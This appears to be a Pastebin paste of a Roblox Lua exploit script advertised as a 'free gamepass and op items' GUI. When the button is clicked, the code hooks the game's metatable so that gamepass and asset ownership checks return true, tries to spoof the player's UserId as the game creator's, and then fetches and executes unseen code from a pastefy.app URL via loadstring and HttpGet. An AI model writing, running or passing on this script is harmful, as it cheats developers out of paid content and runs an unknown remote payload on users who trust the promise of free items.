FreeRobloxScripts1

Free Gamepass

Jun 25th, 2023 (edited)
1,087
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.46 KB | None | 1 0
  1. -- Made By Haxker_6666666
  2. -- Op Tools Not Load If Your Wifi Slow
  3.  
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local Frame = Instance.new("Frame")
  6. local TextButton = Instance.new("TextButton")
  7. local TextButton_Roundify_12px = Instance.new("ImageLabel")
  8. local TextLabel = Instance.new("TextLabel")
  9. local TextLabel_2 = Instance.new("TextLabel")
  10. local TextButton_2 = Instance.new("TextButton")
  11.  
  12. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  13.  
  14. Frame.Parent = ScreenGui
  15. Frame.BackgroundColor3 = Color3.new(0, 0, 0)
  16. Frame.BorderSizePixel = 0
  17. Frame.Position = UDim2.new(0.380307138, 0, 0.356790125, 0)
  18. Frame.Size = UDim2.new(0, 264, 0, 232)
  19.  
  20. TextButton.Parent = Frame
  21. TextButton.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
  22. TextButton.BackgroundTransparency = 1
  23. TextButton.BorderSizePixel = 0
  24. TextButton.Position = UDim2.new(0.075757578, 0, 0.238093197, 0)
  25. TextButton.Size = UDim2.new(0, 223, 0, 61)
  26. TextButton.ZIndex = 10
  27. TextButton.Font = Enum.Font.SourceSansBold
  28. TextButton.Text = "Click to get free gamepasses and op items!"
  29. TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
  30. TextButton.TextScaled = true
  31. TextButton.TextSize = 14
  32. TextButton.TextWrapped = true
  33.  
  34. TextButton_Roundify_12px.Name = "TextButton_Roundify_12px"
  35. TextButton_Roundify_12px.Parent = TextButton
  36. TextButton_Roundify_12px.Active = true
  37. TextButton_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5)
  38. TextButton_Roundify_12px.BackgroundColor3 = Color3.new(1, 1, 1)
  39. TextButton_Roundify_12px.BackgroundTransparency = 1
  40. TextButton_Roundify_12px.Position = UDim2.new(0.493303567, 0, 0.5, 0)
  41. TextButton_Roundify_12px.Selectable = true
  42. TextButton_Roundify_12px.Size = UDim2.new(1.07589281, 0, 0.99999994, 0)
  43. TextButton_Roundify_12px.ZIndex = 2
  44. TextButton_Roundify_12px.Image = "rbxassetid://3570695787"
  45. TextButton_Roundify_12px.ImageColor3 = Color3.new(0.886275, 0.886275, 0.886275)
  46. TextButton_Roundify_12px.ScaleType = Enum.ScaleType.Slice
  47. TextButton_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100)
  48.  
  49. TextLabel.Parent = Frame
  50. TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  51. TextLabel.BackgroundTransparency = 1
  52. TextLabel.BorderSizePixel = 0
  53. TextLabel.Position = UDim2.new(0.0265151523, 0, 0.5661062, 0)
  54. TextLabel.Size = UDim2.new(0, 249, 0, 63)
  55. TextLabel.ZIndex = 5
  56. TextLabel.Font = Enum.Font.SourceSansBold
  57. TextLabel.Text = "Made By Haxker_66666666"
  58. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 0)
  59. TextLabel.TextScaled = true
  60. TextLabel.TextSize = 14
  61. TextLabel.TextWrapped = true
  62.  
  63. TextLabel_2.Parent = Frame
  64. TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  65. TextLabel_2.BackgroundTransparency = 1
  66. TextLabel_2.BorderSizePixel = 0
  67. TextLabel_2.Position = UDim2.new(7.4505806e-09, 0, -0.0344827585, 0)
  68. TextLabel_2.Size = UDim2.new(0, 264, 0, 63)
  69. TextLabel_2.ZIndex = 6
  70. TextLabel_2.Font = Enum.Font.Arcade
  71. TextLabel_2.Text = "FREE GAMEPASS GUI + OP ITEMS"
  72. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  73. TextLabel_2.TextScaled = true
  74. TextLabel_2.TextSize = 14
  75. TextLabel_2.TextWrapped = true
  76.  
  77. TextButton_2.Parent = Frame
  78. TextButton_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  79. TextButton_2.BorderSizePixel = 0
  80. TextButton_2.Position = UDim2.new(0.223484844, 0, 0.887931049, 0)
  81. TextButton_2.Size = UDim2.new(0, 146, 0, 26)
  82. TextButton_2.Font = Enum.Font.SourceSansBold
  83. TextButton_2.Text = "Close gui"
  84. TextButton_2.TextColor3 = Color3.fromRGB(255, 0, 0)
  85. TextButton_2.TextScaled = true
  86. TextButton_2.TextSize = 14
  87. TextButton_2.TextWrapped = true
  88.  
  89. -- Scripts
  90.  
  91. local function GAVYODK_fake_script() -- TextButton.LocalScript
  92. local script = Instance.new('LocalScript', TextButton)
  93.  
  94. function onclick()
  95. print("yes!!")
  96. if game.CreatorType == Enum.CreatorType.User then
  97. game.Players.LocalPlayer.UserId = game.CreatorId
  98. end
  99. if game.CreatorType == Enum.CreatorType.Group then
  100. game.Players.LocalPlayer.UserId = game:GetService("GroupService"):GetGroupInfoAsync(game.CreatorId).Owner.Id
  101. end
  102. wait()
  103. local mt = getrawmetatable(game)
  104. local old = mt.__namecall
  105. setreadonly(mt, false)
  106. mt.__namecall = newcclosure(function(self, ...)
  107. local method = getnamecallmethod()
  108. if method == 'UserOwnsGamePassAsync' or method == 'PlayerHasPass' or method == 'PlayerOwnsAsset' then
  109. return true
  110. end
  111. return old(self, ...)
  112. end)
  113. setreadonly(mt, true)
  114. wait(0.5)
  115. game.Players.LocalPlayer.Character.Humanoid.Health = 0
  116.  
  117. repeat wait() until game.Players.LocalPlayer.Character.Humanoid.Health ~= 0
  118. loadstring(game:HttpGet(('https://pastefy.app/VYIAk3o1/raw'),true))()
  119.  
  120. game.StarterGui:SetCore("SendNotification", {
  121. Title = "Script";
  122. Text = "Now You Have Free Gamepass And Op Tools!";
  123. Icon = "rbxassetid://13689518396";
  124. Duration = 10;
  125. })
  126. end
  127.  
  128. script.Parent.MouseButton1Click:connect(onclick)
  129. end
  130. coroutine.wrap(GAVYODK_fake_script)()
  131. local function BYKIYL_fake_script() -- TextLabel_2.LocalScript
  132. local script = Instance.new('Script', TextLabel_2)
  133.  
  134. local text = script.Parent
  135. local add = 10
  136. wait()
  137. local k = 1
  138. while k <= 255 do
  139. text.TextColor3 = Color3.new(k/255,0/255,0/255)
  140. k = k + add
  141. wait()
  142. end
  143. while true do
  144. k = 1
  145. while k <= 255 do
  146. text.TextColor3 = Color3.new(255/255,k/255,0/255)
  147. k = k + add
  148. wait()
  149. end
  150. k = 1
  151. while k <= 255 do
  152. text.TextColor3 = Color3.new(255/255 - k/255,255/255,0/255)
  153. k = k + add
  154. wait()
  155. end
  156. k = 1
  157. while k <= 255 do
  158. text.TextColor3 = Color3.new(0/255,255/255,k/255)
  159. k = k + add
  160. wait()
  161. end
  162. k = 1
  163. while k <= 255 do
  164. text.TextColor3 = Color3.new(0/255,255/255 - k/255,255/255)
  165. k = k + add
  166. wait()
  167. end
  168. k = 1
  169. while k <= 255 do
  170. text.TextColor3 = Color3.new(k/255,0/255,255/255)
  171. k = k + add
  172. wait()
  173. end
  174. k = 1
  175. while k <= 255 do
  176. text.TextColor3 = Color3.new(255/255,0/255,255/255 - k/255)
  177. k = k + add
  178. wait()
  179. end
  180. while k <= 255 do
  181. text.TextColor3 = Color3.new(255/255 - k/255,0/255,0/255)
  182. k = k + add
  183. wait()
  184. end
  185. end
  186. end
  187. coroutine.wrap(BYKIYL_fake_script)()
  188. local function SOIYI_fake_script() -- Frame.LocalScript
  189. local script = Instance.new('LocalScript', Frame)
  190.  
  191. script.Parent.Active = true
  192. script.Parent.Draggable = true
  193. end
  194. coroutine.wrap(SOIYI_fake_script)()
  195. local function TCHPMMP_fake_script() -- TextButton_2.LocalScript
  196. local script = Instance.new('LocalScript', TextButton_2)
  197.  
  198. function onclick()
  199. script.Parent.Parent:Destroy()
  200. end
  201.  
  202.  
  203. script.Parent.MouseButton1Click:connect(onclick)
  204. end
  205. coroutine.wrap(TCHPMMP_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment